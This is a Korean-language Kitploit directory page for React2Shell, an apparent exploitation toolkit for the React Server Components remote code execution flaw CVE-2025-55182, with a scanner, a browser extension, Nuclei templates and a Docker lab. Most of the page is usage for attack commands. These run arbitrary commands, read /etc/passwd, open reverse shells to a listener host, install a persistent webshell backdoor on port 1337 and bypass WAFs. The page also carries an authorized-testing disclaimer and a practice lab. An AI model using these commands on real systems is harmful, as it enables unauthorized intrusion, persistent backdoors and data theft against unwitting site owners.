Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
React2Shell — CVE-2025-55182 보안 테스트 키트: CLI 스캐너 + Chrome 확장 프로그램 + Nuclei 템플릿 + Docker 랩. | Kitploit
도구/GitHubGitHub/sho-luv/react2shell
Vulnerability ScannersExploit FrameworksWeb Application ExploitationWAF BypassWeb SecurityCTFPenetration TestingLearning & EducationPayload DevelopmentLabs & Practice
GitHubsho-luv/react2shell

React2Shell

9239개월 전아직 검토되지 않음

CVE-2025-55182 보안 테스트 키트: CLI 스캐너 + Chrome 확장 프로그램 + Nuclei 템플릿 + Docker 랩.

저장소 보기

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

React2Shell

CVE-2025-55182 스캐너 및 익스플로잇 툴킷 for Next.js/React 서버 컴포넌트 RCE.

저장소 구조

root@kitploit:~
React2Shell/
├── browser-extension/    # 브라우저 기반 탐지를 위한 Chrome 확장 프로그램
│   ├── manifest.json
│   ├── content.js
│   ├── popup.html/js
│   └── background.js
├── cli/                  # 명령줄 스캐너 및 익스플로잇 도구
│   ├── react2shell.py
│   └── requirements.txt
├── docs/                 # 학습 중심 문서
│   ├── README.md         # 학습 경로 인덱스
│   ├── 01-fundamentals.md
│   ├── 02-vulnerability.md
│   ├── 03-exploitation.md
│   ├── 04-frameworks.md
│   └── 05-defense.md
├── lab/                  # 테스트용 Docker 실습 환경
│   ├── vulnerable/       # 취약한 Next.js 앱 (React 19.2.0)
│   ├── patched/          # 패치된 Next.js 앱 (React 19.2.1)
│   ├── waf/              # ModSecurity WAF 컨테이너
│   ├── waku-app/         # 취약한 Waku 앱 (React 19.2.0)
│   ├── react-router-app/ # 취약한 React Router 앱 (React 19.2.0)
│   └── docker-compose.yml
└── nuclei/               # Nuclei 템플릿
    ├── CVE-2025-55182.yaml       # RCE 탐지 (코드 실행)
    └── CVE-2025-55182-safe.yaml  # 안전한 사이드 채널 탐지

빠른 시작

CLI 도구

root@kitploit:~
cd cli
pip install -r requirements.txt

# 대상 스캔
python react2shell.py https://target.com

# 명령 실행
python react2shell.py https://target.com -c "id"

# 대화형 셸
python react2shell.py https://target.com -i

브라우저 확장 프로그램

  1. chrome://extensions/ 열기
  2. "개발자 모드" 활성화
  3. "로드되지 않은 확장 프로그램 로드" 클릭
  4. browser-extension 디렉터리 선택

실습 환경

root@kitploit:~
cd lab
docker-compose up -d

# 공격 가능 대상:
# Next.js 취약:      http://localhost:3011  ← 전체 RCE
# Waku 취약:         http://localhost:3014  ← RCE (블라인드 - HTTP 출력 없음)
# React Router:      http://localhost:3015  ← 전체 RCE (ESM)

# 보호 대상:
# Next.js 패치됨:    http://localhost:3012  ← 안전
# WAF 보호:          http://localhost:3013  ← ModSecurity가 익스플로잇 차단

Nuclei 스캐너

root@kitploit:~
nuclei -t nuclei/CVE-2025-55182.yaml -u https://target.com

기능

CLI 도구 (cli/react2shell.py)

  • 멀티 프레임워크 지원 - Next.js, Waku, React Router, Expo, Vite RSC, Parcel RSC
  • 프레임워크 탐지 (--detect) - 대상 프레임워크 자동 탐지
  • 엔드포인트 열거 (-E) - RSC 엔드포인트 자동 발견
  • 취약점 스캔 - 단일 URL 또는 파일에서 배치 스캔
  • 명령 실행 (-c) - 임의 명령 실행
  • 대화형 셸 (-i) - 지속적인 명령 세션
  • 리버스 셸 (-r) - 다양한 유형: nc, bash, perl, python, ruby
  • 인메모리 웹셸 (--webshell) - 지속적인 백도어 설치
  • 파일 읽기 (-f) - 원격 파일 직접 읽기
  • 로컬 스캔 (-L) - package.json에서 취약한 버전 확인
  • WAF 우회 - 정크 패딩 (-w), 유니코드 인코딩 (-u), Vercel 전용 (-V)
  • 프록시 지원 (-x) - Burp Suite 또는 다른 프록시를 통한 라우팅
  • 안전 모드 (-s) - 코드 실행 없는 사이드 채널 탐지

브라우저 확장 프로그램 (browser-extension/)

  • RSC 취약점 지표 자동 탐지
  • 설정 가능한 익스플로잇 경로
  • 출력 표시와 함께 명령 실행
  • 활성화/비활성화 토글
  • 시각적 취약/안전 표시기

실습 환경 (lab/)

  • 취약한 Next.js (3011) - X-Action-Redirect를 통한 출력과 전체 RCE
  • Waku (3014) - RCE 확인됨, /RSC/F/{x}/{y}.txt 경로 형식 필요
  • React Router (3015) - ESM 호환 process.getBuiltinModule()을 사용한 전체 RCE
  • 패치된 Next.js (3012) - 익스플로잇 없이 탐지 테스트용
  • WAF 보호 (3013) - 우회 연구를 위한 ModSecurity 규칙
  • 대시보드 (8080) - 공격 로깅 및 시각화

CLI 사용 예제

root@kitploit:~
# 기본 스캔 (프레임워크 자동 탐지)
python react2shell.py https://target.com

# 프레임워크 탐지 및 엔드포인트 열거
python react2shell.py https://target.com --detect
python react2shell.py https://target.com -E -v

# 다른 프레임워크에서 명령 실행
python react2shell.py https://target.com -c "id"                    # Next.js (자동)
python react2shell.py https://target.com -F waku -c "id"            # Waku (블라인드 RCE)
python react2shell.py https://target.com -F react-router -c "id"    # React Router (ESM)

# 출력이 있는 실습 예제
python react2shell.py http://localhost:3011 -c "cat /app/secret/flag.txt"  # Next.js
python react2shell.py http://localhost:3015 -F react-router -c "id"        # React Router

# 모든 WAF 우회와 함께 명령 실행
python react2shell.py https://target.com -c "cat /etc/passwd" -w -u

# 프록시를 통한 대화형 셸
python react2shell.py https://target.com -i -x http://127.0.0.1:8080

# 인메모리 웹셸 설치 (1337 포트에 백도어 생성)
python react2shell.py https://target.com --webshell mypassword
# 접속: curl 'http://target:1337/?p=mypassword&cmd=id'

# 리버스 셸
python react2shell.py https://target.com -r -l 10.0.0.1 -p 4444 -S bash

# 로컬 프로젝트에서 취약한 버전 스캔
python react2shell.py -L /path/to/project

# 출력과 함께 배치 스캔
python react2shell.py targets.txt -t 20 -o results.json -v

모든 CLI 옵션

root@kitploit:~
실행 옵션:
  -c, --cmd             실행할 명령
  -i, --interactive     대화형 셸 세션
  -r, --reverse         리버스 셸 모드
  -l, --lhost           리스너 호스트
  -p, --lport           리스너 포트
  -S, --shell-type      셸 유형 (nc, nc-mkfifo, bash, perl, python, ruby)
  -f, --read-file       원격 파일 읽기

스캔 옵션:
  -P, --path            테스트할 경로 (쉼표로 구분 또는 파일)
  -t, --threads         스레드 수 (기본값: 10)
  -T, --timeout         요청 제한 시간(초) (기본값: 10)
  -s, --safe            안전 모드 (코드 실행 없음)
  -L, --local           로컬 프로젝트 디렉터리 스캔
  -F, --framework       대상 프레임워크 (auto, nextjs, waku, react-router, expo)
  -E, --enumerate       익스플로잇 전 RSC 엔드포인트 열거
  --detect              프레임워크만 탐지하고 엔드포인트 나열
  --webshell            1337 포트에 인메모리 웹셸 설치
  --rce                 RCE 개념 증명 모드 (기본값: 안전 모드)

우회 옵션:
  -w, --waf-bypass      정크 데이터 패딩
  -W, --waf-size        정크 크기(KB) (기본값: 128)
  -u, --unicode         유니코드 인코딩 우회
  -V, --vercel-bypass   Vercel 전용 우회
  --windows             Windows PowerShell 페이로드

요청 옵션:
  -x, --proxy           프록시 URL (예: http://127.0.0.1:8080)
  -H, --header          사용자 정의 헤더
  -A, --user-agent      사용자 정의 User-Agent
  -k, --insecure        SSL 검증 비활성화

출력 옵션:
  -o, --output          결과를 JSON으로 저장
  -v, --verbose         버전 탐지와 함께 자세한 출력
  -q, --quiet           취약한 대상만 표시
  --no-color            색상 비활성화
  --no-banner           배너 숨기기

CVE-2025-55182 세부 정보

필드값
CVSS10.0 (심각)
영향인증되지 않은 원격 코드 실행
영향받는 대상취약한 React 버전을 사용하는 모든 RSC 프레임워크
매커니즘React Flight 프로토콜을 통한 프로토타입 오염

영향받는 프레임워크

프레임워크취약한 버전패치된 버전
React19.0.0 - 19.2.019.2.1+
Next.js14.0.0 - 15.4.715.4.8+
Waku< 0.27.20.27.2+
React Router7.0.0 - 7.5.0 (RSC 미리보기)7.5.1+
Expo실험적 RSCReact 업데이트
@vitejs/plugin-rsc취약한 React를 사용하는 모든 버전React 업데이트
@parcel/rsc취약한 React를 사용하는 모든 버전React 업데이트
RedwoodJS (rwsdk)취약한 React를 사용하는 모든 버전React 업데이트

크레딧

  • mrknow001/RSC_Detector
  • assetnote/react2shell-scanner
  • Chocapikk/CVE-2025-55182
  • hackersatyamrastogi/react2shell-ultimate
  • ProjectDiscovery Nuclei 템플릿

면책 조항

이 툴킷은 허가된 보안 테스트 전용입니다. 소유하고 있거나 명시적인 서면 허가를 받은 시스템에서만 사용하십시오. 컴퓨터 시스템에 대한 무단 액세스는 불법입니다.


CVE-2025-55182 | CVSS 10.0 | 허가된 보안 테스트 전용

도구 다운로드